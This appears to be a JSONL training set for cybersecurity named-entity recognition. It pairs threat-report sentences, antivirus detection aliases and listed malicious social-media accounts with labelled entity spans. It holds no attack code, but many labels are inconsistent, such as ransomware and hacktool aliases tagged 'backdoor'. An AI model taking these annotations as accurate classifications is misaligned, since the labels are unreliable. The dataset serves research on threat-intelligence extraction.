{"text": "A backdoor also known as: Win32/PSWSpider.E Backdoor.Bancodor.M Backdoor.Bancodor.M Backdoor.Bancodor.M Backdoor/Bancodor.m Backdoor.Bancodor.M W32/Bancodor.T@bd Backdoor.Badcodor Win32/Bancodor.M BKDR_BANCODOR.M Win.Trojan.Bancodor-27 Backdoor.Win32.Bancodor.m Trojan.Win32.Bancodor.dbrs Backdoor.Win32.Bancodor.513024[h] Backdoor.W32.Bancodor.m!c Backdoor.Bancodor.M Backdoor.Win32.Bancodor.~O Backdoor.Bancodor.M Trojan.Bancdo Backdoor.Bancodor.Win32.40 BKDR_BANCODOR.M W32/Bancodor.UWGT-1776 Backdoor/Bancodor.ak BDS/Bancodor.M.1 Trojan[Backdoor]/Win32.Bancodor Backdoor.Bancodor.M Backdoor:Win32/Bancodor.M Win-Trojan/Bancodor.513024.C Backdoor.Bancodor Bck/Bancodor.E Win32.Backdoor.Bancodor.Oyep Backdoor.Bancodor!IZl0vEMNH4U Backdoor.Win32.Bancodor Backdoor.Bancodor.M BackDoor.Bancodor.AS Backdoor.Win32.Bancodor.m", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000198", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dropper.GreenStuff.1.7 Win32.Trojan.WisdomEyes.16070401.9500.9688 Trojan.Dropper Win32/Pasorot.D Win.Trojan.Greenstuff-3 Trojan.Dropper.GreenStuff.1.7 Trojan-Dropper.Win32.GreenStuff.17 Trojan.Dropper.GreenStuff.1.7 Troj.Dropper.W32.GreenStuff.17!c Win32.Trojan-dropper.Greenstuff.Ebgv Trojan.Dropper.GreenStuff.1.7 TrojWare.Win32.TrojanDropper.GreenStuff.17 Trojan.Dropper.GreenStuff.1.7 Trojan.MulDrop.365 Dropper.GreenStuff.Win32.14 BehavesLike.Win32.Trojan.dc W32/Trojan.KLUP-2808 TrojanDropper.Exebinder TR/Pasorot.g Trojan[PSW]/Win32.Pasorot Trojan.Dropper.GreenStuff.1.7 Trojan-Dropper.Win32.GreenStuff.17 TrojanDropper:Win32/GreenStuff.1_7 Trojan/Win32.Downloader.C112567 TScope.Malware-Cryptor.SB Trj/Dropper.WF Win32/TrojanDropper.GreenStuff.17 W32/GreenSt.B!tr.dr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000201", "source": "cyner2_train"}}
{"text": "A backdoor also known as: MemScan:Trojan.Downloader.Modgof.A MemScan:Trojan.Downloader.Modgof.A Trojan.Scar.daok Trojan.Win32.Scar.tlmwj TROJ_AZAH.A Trojan.Win32.Scar.daok MemScan:Trojan.Downloader.Modgof.A Trojan.Scar!ZI1ghG8RGXc MemScan:Trojan.Downloader.Modgof.A Trojan.MulDrop1.43719 TROJ_AZAH.A Win32.Troj.Scar.kcloud Trojan.Win32.A.Downloader.120320.DL MemScan:Trojan.Downloader.Modgof.A Worm.Win32.FakeFolder.b W32/AZAH.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000202", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.FakeGina.X Trojan.Fakegina Trojan.FakeGina.X Trojan/FakeGina.b TROJ_FAKEGINA.AA Win32.Trojan.FakeGina.b W32/Risk.LOJP-2889 Trojan.Fakegina TROJ_FAKEGINA.AA Trojan.FakeGina.X Trojan.FakeGina.X Trojan.FakeGina.X TrojWare.Win32.FakeGina.~B Trojan.FakeGina.X Trojan.FakeGina.Win32.121 Trojan.Win32.FakeGina W32/MalwareF.NCOX Trojan/Win32.FakeGina Trojan.FakeGina.X Trojan:Win32/Fakegina.T Trojan/Win32.FakeGina.R77324 Win32/FakeGina.B Win32.Trojan.Fakegina.Wmst W32/FakeGina.AA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000204", "source": "cyner2_train"}}
{"text": "The campaign targeted Japanese organizations by using at least two legitimate Japanese websites to host a strategic web compromise SWC, where victims ultimately downloaded a variant of the SOGU malware.", "spans": {"MALWARE: campaign": [[4, 12]], "ORGANIZATION: Japanese organizations": [[22, 44]], "MALWARE: SOGU malware.": [[189, 202]]}, "info": {"id": "cyner2_train_000206", "source": "cyner2_train"}}
{"text": "It connects to a certain URL, likely controlled by the attacker, using a specific Go user-agent:", "spans": {"SYSTEM: Go user-agent:": [[82, 96]]}, "info": {"id": "cyner2_train_000207", "source": "cyner2_train"}}
{"text": "The first phase is receiving malspam from a botnet.", "spans": {"MALWARE: botnet.": [[44, 51]]}, "info": {"id": "cyner2_train_000208", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Graftor.D49E51 W32/Trojan.ULWD-7621 Trojan.Win32.Drop.elkhrw BehavesLike.Win32.Sivis.kh Trojan-Dropper.Win32.Rubat W32/Win.G Trojan.SchoolGirl.er TR/Drop.Rubat.qlzld TrojanDropper:Win32/Rubat.A!bit Trojan.SchoolGirl", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000209", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.CominateU.Adware Trojan-GameThief.Win32.OnLineGames!O TrojanGameThief.OnLineGames Trojan.OnLineGames.Win32.78851 Trojan/OnLineGames.boaj Trojan.Zusy.Elzob.D484 W32/Risk.ADYI-1535 TSPY_ONLIN.SMUM Win.Spyware.82985-2 Trojan-GameThief.Win32.OnLineGames.boaj Trojan.Win32.OnLineGames.cptyo BackDoor.Sturf.170 TSPY_ONLIN.SMUM W32/MalwareF.AEIUQ Trojan/PSW.OnLineGames.cedq TR/Spy.671314 Trojan[GameThief]/Win32.OnLineGames Trojan-GameThief.Win32.OnLineGames.boaj Trojan/Win32.OnlineGameHack.R11892 TrojanPSW.OnLineGames.bo Win32/PSW.OnLineGames.QDP Trojan.PWS.OnLineGames!mLCnhslfoqM Trojan-GameThief.Win32.OnLineGames W32/Onlinegames.BOJI!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000212", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Timer.55808.B Trojan-Ransom.Win32.Timer!O Trojan/Kryptik.sot Trojan.Boigy.4 TROJ_RANSOM.SMMJ Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Ransom.GED TROJ_RANSOM.SMMJ Trojan-Ransom.Win32.Timer.icg Trojan.Win32.Timer.dqvge Trojan.Win32.A.Timer.55808 Trojan.Winlock.4005 Trojan/Timer.cnd TR/Ramson.TR TrojanDropper:Win32/Dinome.A Trojan-Ransom.Win32.Timer.icg Trojan/Win32.Ransomlock.R11433 BScope.Trojan.Winlock.01505 Trj/Hexas.HEU Trojan-Downloader.Win32.Karagany", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000213", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom/W32.Foreign.409600.C Trojan.Foreign Ransom_Foreign.R002C0DB418 Trojan-Ransom.Win32.Foreign.nxzy Trojan.Win32.Spambot.exqsne Trojan.Win32.Z.Trubsil.409600 Troj.Ransom.W32.Foreign!c Trojan.Spambot.15075 Ransom_Foreign.R002C0DB418 BehavesLike.Win32.Ransom.gc TR/Crypt.ZPACK.lpngp Backdoor:Win32/Trubsil.C Trojan-Ransom.Win32.Foreign.nxzy Trojan/Win32.Foreign.C2394896 TrojanRansom.Foreign Trj/GdSda.A W32/Kryptik.FRKA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000218", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DakusarDRAX.Trojan Trojan.Floxif Win32.Trojan.WisdomEyes.16070401.9500.9948 Win32/Flofix.D TROJ_FLOXIF_EK040354.UVPM Trojan.Win32.Floxif.cqjmcu Win32.FloodFix Trojan.Floxif.Win32.2 TROJ_FLOXIF_EK040354.UVPM TR/Spy.69337 Trojan:Win32/Floxif.E Virus/Win32.Fixflo.R204310 Trojan.Sly Win32/Floxif.E W32/Floxif.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000221", "source": "cyner2_train"}}
{"text": "] com Malicious Twitter accounts : https : //twitter.com/lucky88755 https : //twitter.com/lucky98745 https : //twitter.com/lucky876543 https : //twitter.com/luckyone1232 https : //twitter.com/sadwqewqeqw https : //twitter.com/gyugyu87418490 https : //twitter.com/fdgoer343 https : //twitter.com/sdfghuio342 https : //twitter.com/asdqweqweqeqw https : //twitter.com/ukenivor3 Malicious Instagram account : https : //www.instagram.com/freedomguidepeople1830/ Malicious Tumblr accounts : https : //mainsheetgyam.tumblr.com/ https : //hormonaljgrj.tumblr.com/ https : //globalanab.tumblr.com/ C & C addresses : 104 [ .", "spans": {"ORGANIZATION: Twitter": [[16, 23]], "ORGANIZATION: Instagram": [[385, 394]], "ORGANIZATION: Tumblr": [[467, 473]]}, "info": {"id": "cyner2_train_000222", "source": "cyner2_train"}}
{"text": "Unit 42 discovered new activity that appears related to an adversary group previously called C0d0so0 or Codoso", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: adversary group": [[59, 74]], "THREAT_ACTOR: C0d0so0": [[93, 100]], "THREAT_ACTOR: Codoso": [[104, 110]]}, "info": {"id": "cyner2_train_000223", "source": "cyner2_train"}}
{"text": "We have observed download attempts from the following domains:", "spans": {}, "info": {"id": "cyner2_train_000225", "source": "cyner2_train"}}
{"text": "In 2022, they updated SysUpdate, one of their custom malware families, to include new features and add malware infection support for the Linux platform.", "spans": {"MALWARE: SysUpdate,": [[22, 32]], "MALWARE: custom malware families,": [[46, 70]], "MALWARE: malware": [[103, 110]], "SYSTEM: Linux platform.": [[137, 152]]}, "info": {"id": "cyner2_train_000226", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.3797 JS.Nemucod.LK VBS/DropExe.A!Camelot Trojan.Script.MLW.eafugn VBS.Dropper.102 TrojanDropper.VBS.aq TrojanDropper:VBS/Twexag.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000227", "source": "cyner2_train"}}
{"text": "East Asian government agencies came under siege when attackers targeted several servers within their networks.", "spans": {"ORGANIZATION: East Asian government agencies": [[0, 30]], "SYSTEM: networks.": [[101, 110]]}, "info": {"id": "cyner2_train_000228", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/AutoRun.autv W32/Sohanad.G WORM_SOHANAD.DX Virus.Worm.AutoRun!IK Win32.HLLW.Autoruner.8327 WORM_SOHANAD.DX W32/Sohanad.G Worm/AutoRun.mky Malware.Imaut Virus.Worm.AutoRun SHeur.CIAA Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000230", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.RansomKD.6014218 Ransom.Chicrypt Ransom.Chimera Trojan/Kryptik.edes Trojan.RansomKD.D5BC50A Ransom_Chicrypt.R002C0DIL17 W32/Ransom.IF Trojan-Ransom.Win32.Chimera.q Trojan.RansomKD.6014218 Trojan.Win32.Encoder.esuyoq Troj.Ransom.W32!c Win32.Trojan.Chimera.Edei Trojan.RansomKD.6014218 Trojan.RansomKD.6014218 Trojan.Encoder.2774 W32/Ransom.KXVS-1328 W32.Ransom.Chimera Trojan[Ransom]/Win32.Chimera Ransom:Win32/Chicrypt.A Trojan.Win32.Z.Ransom.647242 Trojan-Ransom.Win32.Chimera.q Win32.Trojan-Ransom.Chimera.D Trojan/Win32.Chimera.C1182585 Trojan.RansomKD.6014218 Hoax.Chimera Trojan.Kryptik!1o3s7Z7mkiE W32/Chimera.EDES!tr Win32/Trojan.37c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000231", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.ClickerAybn.Trojan Trojan-Spy.Win32.VB!O Trojan.Puzlice.A3 Win32.Trojan-Clicker.VB.c Win32/TrojanClicker.VB.NUE Win.Trojan.7640471-1 Worm.Win32.Autorun.gxay Trojan.Win32.VB2.cnioik Trojan.Win32.A.VB.55040 W32.Virut.lQTU TrojWare.Win32.Spy.VB.FRG Trojan.VbCrypt.68 Trojan.VB.Win32.83289 BehavesLike.Win32.Malware.nc Virus.Win32.Virut TrojanSpy.VB.cxx Trojan[Spy]/Win32.VB Worm.Win32.Autorun.gxay Trojan:Win32/Puzlice.A Win32/VB.BXL TScope.Trojan.VB Trojan.Vilsel TrojanSpy.VB!jmRymi1V2Tw W32/VBClicker.NUE!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000232", "source": "cyner2_train"}}
{"text": "A pro-democracy reform took place in 2011 which has helped the government create an atmopshere conducive to investor interest.", "spans": {}, "info": {"id": "cyner2_train_000234", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Turla.B5 BKDR64_TURLA.NUS Trojan.Turla BKDR64_TURLA.NUS Win64.Rootkit.Uroburos.A Backdoor.Win64.Turla.c Trojan.Win64.Turla.dflvhj BackDoor.Turla.17 Trojan.Turla.Win64.1 BDS/Turla.fech Backdoor.Win64.Turla.c Backdoor:Win64/Turla.B!dha Trojan/Win64.Turla.C560438 Backdoor.Turla Trj/CI.A Win64/Turla.A Win32.Trojan.Url.Fdjm Trojan.Turla!2u6AW7YKCfw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000235", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Japik.6 TROJ_IKYTOK.SMI Win32.Trojan.WisdomEyes.16070401.9500.9979 Trojan.Ransomlock TROJ_IKYTOK.SMI Trojan.Packed.2232 Trojan.Kryptik.Win32.166130 BehavesLike.Win32.VTFlooder.fc Trojan-Downloader.Win32.Karagany TrojanDropper.Mudrop.cmh TrojanDropper:Win32/Sinmis.B Trojan/Win32.Menti.R9584 BScope.Malware-Cryptor.Tip", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000238", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dynamer.S23079 Win32.Trojan.Kryptik.bil Win.Malware.Zusy-5689799-0 Trojan.Inject2.38898 Trojan.Kryptik.Win32.992532 BehavesLike.Win32.PWSZbot.cm Trojan.Win32.Extenbro Backdoor.Androm.mnb TR/Crypt.ZPACK.pwvcr Trojan.Symmi.D10FCD Trojan/Win32.Androm.R192120", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000239", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PDF/Phish.ECM Win32.Exploit.Pidief.Aexw PDF/Phish.ECM EXP/Pidief.EB.494 Exp.Pidief.Eb!c Trojan.PDF.Phishing Win32/Trojan.Exploit.ec6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000240", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HackTool.TSGrinder Trojan/Hacktool.TSGrinder.a W32/Tool.JPZP-4469 Crackin.0AC64262 HackTool.Win32.TSGrinder.a Trojan.Win32.TSGrinder.scgl HackTool.TSGrinder.192570 Hacktool.W32.Tsgrinder!c ApplicUnsaf.Win32.HackTool.TSGrinder.a Tool.TSGrinder W32/VirTool.AYV W32.Hack.Tool HackTool/Win32.TSGrinder HackTool.Win32.TSGrinder.a HackTool:Win32/Tsgrinder.A Win32.Hacktool.Tsgrinder.Stkm HackTool.TSGrinder!LpD0k7ExEpE HackTool.Win32.TSGrinder.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000244", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Lorozoad.A3 Trojan.Razy.D2614 Win32.Trojan.WisdomEyes.16070401.9500.9997 Win.Trojan.Lorozoad-1 Trojan.MSIL.Disfa.mcnf Trojan.Win32.Tiny.etgbky Trojan.Win32.Z.Razy.4608.CD Troj.Msil.Disfa!c TrojWare.MSIL.TrojanDownloader.Tiny.MXA BehavesLike.Win32.Trojan.xz TR/Dropper.MSIL.nsnpx Trojan.MSIL.Disfa.mcnf Trj/GdSda.A Msil.Trojan.Disfa.Pctb Trojan.Disfa!3Wzl0Mq4C1c Trojan-Downloader.MSIL.Tiny MSIL/Tiny.MX!tr.dldr Win32/Trojan.85b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000246", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DownloadPdzLnrA.Trojan Worm.Win32.WBNA!O W32/WBNA.asj Win32.Trojan.WisdomEyes.16070401.9500.9988 Win.Trojan.Wbna-299 Worm.WBNA.Win32.2209 BehavesLike.Win32.VBObfus.qt W32/VB.PID!tr.dldr Worm/Win32.WBNA Worm.WBNA Win32/TrojanDownloader.VB.PID Trojan-Downloader.Win32.VB Win32/Trojan.c6e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000247", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Trojan.LNJS-3256 Trojan.Win32.Mazel.dsuwke BehavesLike.Win32.Sytro.lc TR/AD.Lentrigy.ejnsf RiskWare[Downloader]/NSIS.Mazel Trojan.Jaiko.851 TrojanDownloader:Win32/Rolkator.A Trj/CI.A Trojan.Win32.IRCBot Win32/Trojan.698", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000248", "source": "cyner2_train"}}
{"text": "We have not identified any other public names for this malware, so rather than introduce a new name to the industry we'll refer to this family as Sarvdap.", "spans": {"MALWARE: malware,": [[55, 63]], "ORGANIZATION: industry": [[107, 115]], "MALWARE: family": [[136, 142]], "MALWARE: Sarvdap.": [[146, 154]]}, "info": {"id": "cyner2_train_000249", "source": "cyner2_train"}}
{"text": "This information may be useful to any incident responder or blue team looking to defend an organisation.", "spans": {"ORGANIZATION: incident responder": [[38, 56]], "ORGANIZATION: blue team": [[60, 69]]}, "info": {"id": "cyner2_train_000251", "source": "cyner2_train"}}
{"text": "In addition , at this stage the app can process one of these commands : • Collect device info • Install app • Is online ? • Change server domain Out of these , the most interesting command is the “ install app ” command that downloads an encrypted zip file containing the second phase dex file , unpacks and loads it .", "spans": {}, "info": {"id": "cyner2_train_000252", "source": "cyner2_train"}}
{"text": "Infostealer.Banprox.B is a Trojan horse that may steal information from the compromised computer.", "spans": {"MALWARE: Trojan horse": [[27, 39]], "SYSTEM: compromised computer.": [[76, 97]]}, "info": {"id": "cyner2_train_000254", "source": "cyner2_train"}}
{"text": "The incident used a Microsoft Excel file containing malicious macros which wrote a malicious executable and associated files to the victim machine.", "spans": {"MALWARE: malicious macros": [[52, 68]], "MALWARE: malicious executable": [[83, 103]], "SYSTEM: the victim machine.": [[128, 147]]}, "info": {"id": "cyner2_train_000255", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ransom.Locky.20 Win32.Trojan.WisdomEyes.16070401.9500.9879 Ransom_Falock.R002C0DAI18 Trojan.Win32.Z.Ransom.1819072 Ransom_Falock.R002C0DAI18 BehavesLike.Win32.Trojan.th W32/Trojan.CXBD-0386 Ransom:MSIL/Falock.A Trj/GdSda.A Trojan.MSIL.Crypt Win32/Trojan.Ransom.d73", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000256", "source": "cyner2_train"}}
{"text": "In addition, unlike many cyber attacks, an actual physical person was present money mule to pick up the money from affected ATM machines.", "spans": {"MALWARE: money mule": [[78, 88]], "SYSTEM: ATM machines.": [[124, 137]]}, "info": {"id": "cyner2_train_000257", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Spammer.Mail.Norin.A Trojan/W32.Spammer.606720 Email-Flooder.W32.Norin.30!c TROJ_NORIN.30 Hacktool.Spammer TROJ_NORIN.30 Trojan.Spammer.Mail.Norin.A Email-Flooder.Win32.Norin.30 Trojan.Spammer.Mail.Norin.A Trojan.Win32.Norin.dkrt Spyware.Email-Flooder.Norin.606720 Trojan.Spammer.Mail.Norin.A Win32.Spammer.Mail.Norin.30 Trojan.Spammer.Mail.Norin.A Trojan.PWS.Wmhack Tool.Norin.Win32.1 Virus.Win32.Spammer W32/Risk.SGYO-3478 Spammer.Mail.Norin.30 TR/Flood.Norin.30 HackTool[Flooder]/Win32.Norin Win32.Hack.Norin.kcloud Trojan.Spammer.Mail.Norin.A Email-Flooder.Win32.Norin.30 Trojan.Spammer.Mail.Norin.A EmailFlooder.Norin Win32/Spammer.Mail.Norin.30 Win32.Virus.Spammer.Syhs Flooder.Norin!cC98wqxpE9A W32/Spam_Norin.30!tr Win32/Trojan.Flooder.81a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000260", "source": "cyner2_train"}}
{"text": "This attack might also originate from China.", "spans": {}, "info": {"id": "cyner2_train_000261", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.186B Worm.Dorkbot.A Backdoor.W32.Padodor.kZnr Trojan/Spy.qukart Win32.Trojan-Spy.Quart.a Backdoor.Berbew!g1 Win32/Webber.W Win32.Qukart BKDR_BERBEW.SMA Win.Trojan.Crypted-36 Trojan-Proxy.Win32.Qukart.vjh Trojan.Win32.Qukart.etuxeg Worm.Win32.Qukart.K BackDoor.HangUp.43784 BKDR_BERBEW.SMA BehavesLike.Win32.Backdoor.cc Trojan.Win32.Senta TrojanProxy.Qukart.tsk Trojan-Proxy.Win32.Qukart.vjh Win-Trojan/Berbew.51712 TrojanProxy.Qukart Trojan-Ransom.Win32.Pornoasset.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000262", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Heur.Corrupt.PE Tool.BtcMine.30 Backdoor.Win32.Cycbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000264", "source": "cyner2_train"}}
{"text": "Using this SSH brute-forcing network, it took the attackers only a few days to gain root access and full control of the targeted server.", "spans": {"THREAT_ACTOR: attackers": [[50, 59]], "SYSTEM: targeted server.": [[120, 136]]}, "info": {"id": "cyner2_train_000267", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Cosmu.ajmd Trojan.Win32.Cosmu.cptjv Trojan.Win32.Cosmu.ajmd Win32.HLLW.Zebra.2 TR/PSW.Facepass.oina Trojan/Cosmu.fqh PWS:Win32/Facepass.B Trojan.Win32.A.Cosmu.436714 Trojan.Cosmu W32/Cosmu.AJMD!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000268", "source": "cyner2_train"}}
{"text": "When we first discovered the OilRig attack campaign in May 2016, we believed at the time it was a unique attack campaign likely operated by a known, existing threat group.", "spans": {"THREAT_ACTOR: the OilRig attack campaign": [[25, 51]], "THREAT_ACTOR: unique attack campaign": [[98, 120]], "THREAT_ACTOR: threat group.": [[158, 171]]}, "info": {"id": "cyner2_train_000269", "source": "cyner2_train"}}
{"text": "Sundown is something of an outlier from typical exploit kits.", "spans": {"MALWARE: Sundown": [[0, 7]], "MALWARE: exploit kits.": [[48, 61]]}, "info": {"id": "cyner2_train_000272", "source": "cyner2_train"}}
{"text": "The failure of Silicon Valley Bank SVB is a good opportunity for scammers to make a buck out of the crisis, warns the SANS™ Internet Storm Center ISS in Washington DC.", "spans": {"ORGANIZATION: Silicon Valley Bank SVB": [[15, 38]], "ORGANIZATION: the SANS™ Internet Storm Center ISS": [[114, 149]]}, "info": {"id": "cyner2_train_000273", "source": "cyner2_train"}}
{"text": "For example, one version of the Shade cryptor checks victim computers for signs of accounting activity; if it finds any, it doesn't encrypt the files, but instead installs remote control tools in the infected system.", "spans": {"MALWARE: one version": [[13, 24]], "MALWARE: Shade cryptor": [[32, 45]], "SYSTEM: victim computers": [[53, 69]], "MALWARE: remote control tools": [[172, 192]], "SYSTEM: infected system.": [[200, 216]]}, "info": {"id": "cyner2_train_000275", "source": "cyner2_train"}}
{"text": "This post intends to share the results of our research.", "spans": {}, "info": {"id": "cyner2_train_000276", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Spy/W32.KeyLogger.464896.C TrojanSpy.KeyLogger!s9RPvqhksKk Infostealer.Gampass Win32.BDSBackdoor Trojan-Spy.Win32.KeyLogger.gds BackDoor.Cyber Virus.Win32.Delf.DTW!IK TrojanSpy.KeyLogger.cquv Win-Trojan/Keylogger.464896.G Trojan.Win32.Scar.cmim Trojan-PSW.Gampass Virus.Win32.Delf.DTW W32/KeyLogger.GDS!tr PSW.Keylog.AE Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000277", "source": "cyner2_train"}}
{"text": "The appearance of such forms is generated on cybercriminals' command.", "spans": {"THREAT_ACTOR: cybercriminals'": [[45, 60]]}, "info": {"id": "cyner2_train_000279", "source": "cyner2_train"}}
{"text": "CVE-2017-11882 Exploit 8b212ee2d65c4da033c39aebaf59cc51ade45f32f4d91d1daa0bd367889f934d is a Microsoft Word RTF document that exploits `CVE-2017-11882` stack buffer overflow vulnerability in the Microsoft Equation Editor`EQNEDT32.EXE`.", "spans": {"VULNERABILITY: Exploit": [[15, 22]], "VULNERABILITY: exploits": [[126, 134]], "VULNERABILITY: stack buffer overflow vulnerability": [[152, 187]], "SYSTEM: the Microsoft Equation Editor`EQNEDT32.EXE`.": [[191, 235]]}, "info": {"id": "cyner2_train_000281", "source": "cyner2_train"}}
{"text": "This IOC contains indicators for the BLACKCOFFEE malware family that is attributed to APT17.", "spans": {"MALWARE: BLACKCOFFEE malware": [[37, 56]], "THREAT_ACTOR: APT17.": [[86, 92]]}, "info": {"id": "cyner2_train_000282", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Neloweg TR/Drop.Elms.A PWS:Win32/Reder.B Trojan.Neloweg Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000285", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Inject.cvmjon Trojan.Taidoor TROJ_DROPPE.FS Trojan-Dropper.Win32.Injector.jmli Virus.Win32.Part.a TROJ_DROPPE.FS BehavesLike.Win32.Downloader.qm TrojanDropper.Injector.bmtq Trojan[Dropper]/Win32.Injector Win32.Troj.Injector.JM.kcloud Dropper/Win32.Injector TrojanDropper.Injector W32/Injector.JMLI!tr Trojan.Win32.Injector.aJX", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000286", "source": "cyner2_train"}}
{"text": "So we don't have a sensational hop from Linux Mirai to Windows Mirai just yet, that's just a silly statement.", "spans": {"SYSTEM: Linux": [[40, 45]], "MALWARE: Mirai": [[46, 51], [63, 68]], "SYSTEM: Windows": [[55, 62]]}, "info": {"id": "cyner2_train_000287", "source": "cyner2_train"}}
{"text": "A Trojan for Linux written in Go programming language.", "spans": {"MALWARE: Trojan for": [[2, 12]], "SYSTEM: Linux": [[13, 18]], "SYSTEM: Go programming language.": [[30, 54]]}, "info": {"id": "cyner2_train_000288", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Dropper.ALCD Win32/Rimecud.CU TROJ_DROPPR.SMF Win32.Worm.Peerfrag.Aojj Win32.HLLW.Lime.18 Worm.Palevo.Win32.18245 TROJ_DROPPR.SMF BehavesLike.Win32.Madangel.cc W32/Risk.KNKR-8810 Trojan.Zusy.D421A9 Win32/Peerfrag.DI P2P-Worm.Win32.Palevo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000289", "source": "cyner2_train"}}
{"text": "This variant, which we call MULTIGRAIN consists largely of a subset of slightly modified code from NewPosThings.", "spans": {"MALWARE: variant,": [[5, 13]], "MALWARE: MULTIGRAIN": [[28, 38]], "MALWARE: NewPosThings.": [[99, 112]]}, "info": {"id": "cyner2_train_000292", "source": "cyner2_train"}}
{"text": "Whether this is a permanent return to locky or a one off, I don't know at this stage, but Locky have vanished for while before returned.", "spans": {}, "info": {"id": "cyner2_train_000293", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.SamDump.emgukv Uds.Dangerousobject.Multi!c Tool.SamDump.Win32.1 W32/Trojan.PXMQ-2326 TR/Rogue.9140774 PUP/Win32.SamDump.C241237 Riskware.HackTool!GhRtS0e2yEc Win32/Trojan.f29", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000295", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Dwn.ewbodt Trojan.Win32.Z.Starter.4103380 Trojan.DownLoader26.1573 BehavesLike.Win32.Dropper.wc Trojan.Win32.Chifrax W32/Trojan.BMGR-3693 Exploit:Win32/CplLnk.B Win32/Trojan.9b2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000296", "source": "cyner2_train"}}
{"text": "Because of the recent outbreak of the Locky ransomware, Dridex has become synonymous with the distribution of ransomware more generally.", "spans": {"MALWARE: Locky ransomware,": [[38, 55]], "THREAT_ACTOR: Dridex": [[56, 62]], "MALWARE: ransomware": [[110, 120]]}, "info": {"id": "cyner2_train_000297", "source": "cyner2_train"}}
{"text": "PhotoMiner features a unique infection mechanism, reaching endpoints by infecting websites hosted on FTP servers while making money by mining Monero.", "spans": {"MALWARE: PhotoMiner": [[0, 10]], "SYSTEM: FTP servers": [[101, 112]]}, "info": {"id": "cyner2_train_000299", "source": "cyner2_train"}}
